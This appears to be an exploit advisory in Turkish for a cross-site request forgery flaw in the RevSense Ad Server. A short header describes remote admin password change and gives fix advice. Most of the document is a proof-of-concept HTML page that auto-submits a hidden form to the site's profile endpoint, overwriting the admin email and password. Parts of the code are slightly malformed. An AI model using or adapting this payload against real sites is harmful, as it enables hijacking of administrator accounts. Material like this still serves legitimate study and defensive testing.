< ------------------- header data start ------------------- >

#############################################################

# Application Name : RevSense Ad Server

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

# Script Fiyati : FREE
############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=frm method=post action=http://www.Site.com/index.php?section=profile name=BizaRRo>
<input type=hidden name=f[email] value=[email protected] size=40>
<input type=hidden name=f[password] value=bizo size=20>
<input type=hidden name=f[name] value=addadd size=40>
<input type=hidden name=f[url] value=http://www.Site.com size=50>

<input type=hidden name=section value=profile>
<input type=hidden name=id value=1>
<input type=hidden name=redir value=>

<input type=submit value=create name=B1>

< -- bug code end of -- >